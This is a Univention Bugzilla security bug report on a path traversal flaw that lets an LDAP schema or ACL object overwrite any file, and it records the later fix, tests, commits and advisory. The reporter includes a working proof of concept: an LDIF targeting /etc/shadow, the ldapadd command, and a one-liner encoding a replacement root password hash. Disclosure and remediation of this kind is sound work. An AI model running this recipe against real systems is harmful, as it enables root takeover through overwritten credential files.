Univention Bugzilla – Bug 41780
univentionLDAPSchemaFilename=/../../../../../etc/shadow,cn=ldapschema,cn=univention
Last modified: 2021-06-23 07:29:08 CEST
Creating the following object causes to overwrite any file in the filesystem: ~# cat schema.ldif dn: univentionLDAPSchemaFilename=/../../../../../etc/shadow,cn=ldapschema,cn=univention,dc=acl,dc=local cn: foo objectClass: univentionLDAPExtensionSchema univentionLDAPSchemaData:: QlpoOTFBWSZTWcfIJZQAADbfgCAQBAH/8Dfp7NAOm97gIAB1GAPUAAAGgDTI0yaGGjIGIDIAGhoA 0BYCMGmKakPFwKkOawoe9LGtCYbL7wRMLBaABVA5Zg0p5GrRHZB+GKkxxl05I43OBswAqwUDry9S jRKhw6QIRt0oEftbctTZDgPr6LHBLZFUTyS/Qfi7kinChIY+QSyg univentionLDAPSchemaFilename: /../../../../../etc/shadow univentionLDAPSchemaActive: TRUE objectClass: univentionObjectMetadata univentionOwnedByPackageVersion: 2 univentionOwnedByPackage: foo ~# ldapadd -D uid=Administrator,cn=users,$ldap_base -w univention < schema.ldif The same also goes for settings/ldapacl. To generate the file content use the following command: echo 'root:$6$5cAInBgG$7rdZuEujGK1QFoprcNspXsXHsymW3Txp0kDyHFsE.omI.3T0xek3KIneFPZ99Z8dwZnZ2I2O/Tk8x4mNNGSE4.:16965:0:99999:7:::' | python -c "import bz2,sys; sys.stdout.write(bz2.compress(sys.stdin.read()).encode('base64'))"
This issue has been filled against UCS 4.1. The maintenance with bug and security fixes for UCS 4.1 has ended on 5st of April 2018. Customers still on UCS 4.1 are encouraged to update to UCS 4.3. Please contact your partner or Univention for any questions. If this issue still occurs in newer UCS versions, please use "Clone this bug" or simply reopen the issue. In this case please provide detailed information on how this issue is affecting you.
The affected listener is management/univention-ldap/listener/ldap_extension.py but its implementation is in base/univention-lib/python/ldap_extension.py.
I added a test case for the issues, which is currently set to SKIPed. ucs-test (9.0.2-48) 394a75192f69 | Bug #41780: Add 71_udm-settings/52_secure_filename_validation.py The test case tests all combinations: * create/modify/remove ACL/schema objects with ../ and / pathes. * no files are created in different pathes than allowed * if the old files are removed when renaming an object from an valid name to an invalid name * if no file is removed when removing an acl/schema object
Basedir restriction and filename validation has been added. univention-lib (8.0.0-10) 7141c0851292 | Bug #41780: Merge branch 'fbest/41780-schema-filename-injection' into 4.4-0 7cca0ecf0f39 | YAML Bug #41780 78683b480a0e | Bug #41780: PEP 8 54f395162bfb | Bug #41780: limit LDAP ACL's and Schema files to base directory 85cf9162e282 | Bug #41780: fix ldap filter escaping ucs-test (9.0.2-53) 7141c0851292 | Bug #41780: Merge branch 'fbest/41780-schema-filename-injection' into 4.4-0 4ffe8b1c9c47 | Bug #41780: Extend 71_udm-settings/52_secure_filename_validation.py 394a75192f69 | Bug #41780: Add 71_udm-settings/52_secure_filename_validation.py univention-lib.yaml 7141c0851292 | Bug #41780: Merge branch 'fbest/41780-schema-filename-injection' into 4.4-0 7cca0ecf0f39 | YAML Bug #41780
* Code review: Ok * Jenkins Tests: Ok * Advisory: Ok
<http://errata.software-univention.de/ucs/4.4/125.html>